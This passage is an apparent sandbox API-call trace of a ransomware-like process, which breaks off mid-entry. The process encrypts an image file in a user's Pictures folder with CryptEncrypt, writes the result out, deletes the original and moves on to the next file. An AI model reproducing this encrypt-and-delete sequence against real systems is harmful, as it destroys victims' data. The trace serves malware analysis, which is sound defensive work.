[0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0094.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0094.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0094.579] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0094.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0094.579] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e27c0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27c0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0094.579] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.580] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xf6d5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xf6e0) returned 1 [0094.580] CharLowerBuffW (in: lpsz="byte[63201]", cchLength=0xb | out: lpsz="byte[63201]") returned 0xb [0094.580] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0094.580] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xf6d5, dwBufLen=0xf6e0 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xf6e0) returned 1 [0094.589] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.589] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xf6e0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xf6e0, lpOverlapped=0x0) returned 1 [0094.592] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0094.592] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.592] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0094.592] CryptDestroyKey (hKey=0x41ac700) returned 1 [0094.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0094.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0094.592] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.593] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0094.593] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0094.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.593] FreeLibrary (hLibModule=0x756e0000) returned 1 [0094.593] CloseHandle (hObject=0x258) returned 1 [0094.593] CloseHandle (hObject=0x298) returned 1 [0094.596] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp", lpFilePart=0x0) returned 0x35 [0094.596] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\maajsjcxjkdulec2t.bmp")) returned 0x20 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431da28 [0094.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0094.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0094.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37446c80, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0x8aa363d0, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x8aa363d0, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xf6d5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="maAjSjcXjKdUlEc2T.bmp", cAlternateFileName="MAAJSJ~1.BMP")) returned 0x41ac100 [0094.597] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\maAjSjcXjKdUlEc2T.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\maajsjcxjkdulec2t.bmp")) returned 1 [0094.602] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37446c80, ftCreationTime.dwHighDateTime=0x1d5e5da, ftLastAccessTime.dwLowDateTime=0x8aa363d0, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x8aa363d0, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xf6d5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="maAjSjcXjKdUlEc2T.bmp", cAlternateFileName="MAAJSJ~1.BMP")) returned 0 [0094.602] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0094.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0094.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0094.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0094.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e4f0 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0094.603] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0094.603] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0094.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0094.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0094.605] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.605] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.605] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0094.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0094.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9e48 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f98 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0094.606] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.607] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.607] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\OjV9.png", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeae77f70, ftCreationTime.dwHighDateTime=0x1d5e5bc, ftLastAccessTime.dwLowDateTime=0xf924a990, ftLastAccessTime.dwHighDateTime=0x1d5e9f0, ftLastWriteTime.dwLowDateTime=0xf924a990, ftLastWriteTime.dwHighDateTime=0x1d5e9f0, nFileSizeHigh=0x0, nFileSizeLow=0xc97b, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="OjV9.png", cAlternateFileName="")) returned 0x41abfc0 [0094.607] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0094.608] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0094.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0094.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0094.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca160 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0094.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0094.608] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0094.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0094.609] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0094.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0094.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: 